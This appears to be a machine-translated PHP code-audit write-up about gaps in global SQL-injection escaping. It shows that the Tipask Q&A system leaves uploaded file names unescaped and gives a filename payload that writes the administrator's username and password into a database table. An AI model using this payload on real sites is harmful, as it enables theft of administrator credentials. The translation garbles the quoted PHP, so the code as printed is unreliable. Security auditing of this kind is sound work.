[PHP code audit] in those years, we will explore SQL injection together. 7. Summary of global protection blind spots. Part 2: background 0x01
Currently, WEB applications usually defend against SQL injection by checking whether GPC is enabled, and then using the addlashes function to escape special characters such as single quotes. However, there are many blind spots when using such protection. Next, let's look at the following two cases: http://www.cnbraid.com/2016/04/29/sql5.
Blind spots:
① FILES injection. only parameters such as GET and POST are escaped globally, and FILES are omitted;
② Override Variables. dangerous functions: extract (), parse_str (), and $.
0x02 vulnerability analysis
FILES injection
FILES injection is generally generated by bringing the uploaded name to the insert database during the upload process. for details, refer to the tipask Q & A system.
First, let's take a look at how global protection works:
Index. in php: include TIPASK_ROOT. '/model/tipask. class. php '; $ tipask = new tipask (); $ tipask-> run ();...... follow up to/model/tipask. class. in php: function init_request (){...... $ this-> get = taddslashes ($ this-> get, 1); $ this-> post = taddslashes (array_merge ($ _ GET, $ _ POST )); checkattack ($ this-> post, 'post'); checkattack ($ this-> get, 'Get'); unset ($ _ post );}
We can see that addslashes special escape processing is performed on the data transmitted from get and post, and no processing operation is performed on $ _ FILES. we searched $ _ FILES globally and found/control/attach. php has Upload processing. Follow up:
"Data/attach/", // save path "fileType" => array (". rar ",". doc ",". docx ",". zip ",". pdf ",". txt ",". swf ",". wmv "," xsl "), // file format" fileSize "=> 10 // file size limit, in MB); // file Upload status, if SUCCESS is returned successfully, the corresponding string $ state = "SUCCESS"; $ clientFile = $ _ FILES ["upfile"]; if (! Isset ($ clientFile) {echo "{'state': 'The file size exceeds the server configuration! ', 'URL': 'null', 'filetype': 'null'} "; // modify php. upload_max_filesize and post_max_sizeexit;} // format verification $ current_type = strtolower (strrchr ($ clientFile ["name"], '. '); if (! In_array ($ current_type, $ config ['filetype']) {$ state = "unsupported file type! ";}// Size verification $ file_size = 1024*1024 * $ config ['filesize']; if ($ clientFile [" size "]> $ file_size) {$ state = "the file size exceeds the limit! ";}// Save the file if ($ state =" SUCCESS ") {$ targetfile = $ config ['uploadpath']. gmdate ('ymm', $ this-> time ). '/'. random (8 ). strrchr ($ clientFile ["name"], '. '); $ result = $ _ ENV ['Attach']-> movetmpfile ($ clientFile, $ targetfile); if (! $ Result) {$ state = "an error occurred while saving the file! ";} Else {// Here, we will bring the uploaded file name to the database for query $ _ ENV ['Attach ']-> add ($ clientFile [" name "], $ current_type, $ clientFile ["size"], $ targetfile, 0) ;}// return the json data echo '{"state": "' to the browser ":"'. $ state. '"," url ":"'. $ targetfile. '"," fileType ":"'. $ current_type. '"," original ":"'. $ clientFile ["name"]. '"}';}
You can see $ _ ENV ['Attach ']-> add ($ clientFile ["name"]…), Add $ clientFile [name] = $ _ FILES ["upfile"] [name] to the following add warehouse operation, resulting in injection.
base->user['uid'];$this->db->query("INSERT INTO ".DB_TABLEPRE."attach(time,filename,filetype,filesize,location,isimage,uid) VALUES ({$this->base->time},'$filename','$ftype','$fsize','$location',$isimage,$uid)");return $this->db->insert_id();}
Upload a file and change the file name to the following code to get the administrator account password:
filename="1','.php',1,(select concat(username,0x23,password) from ask_user limit 1),2,1)#.jpg"
The password of the administrator account is successfully inserted into the attach table in the database:
Address: http://www.cnbraid.com/2016/05/10/sql6/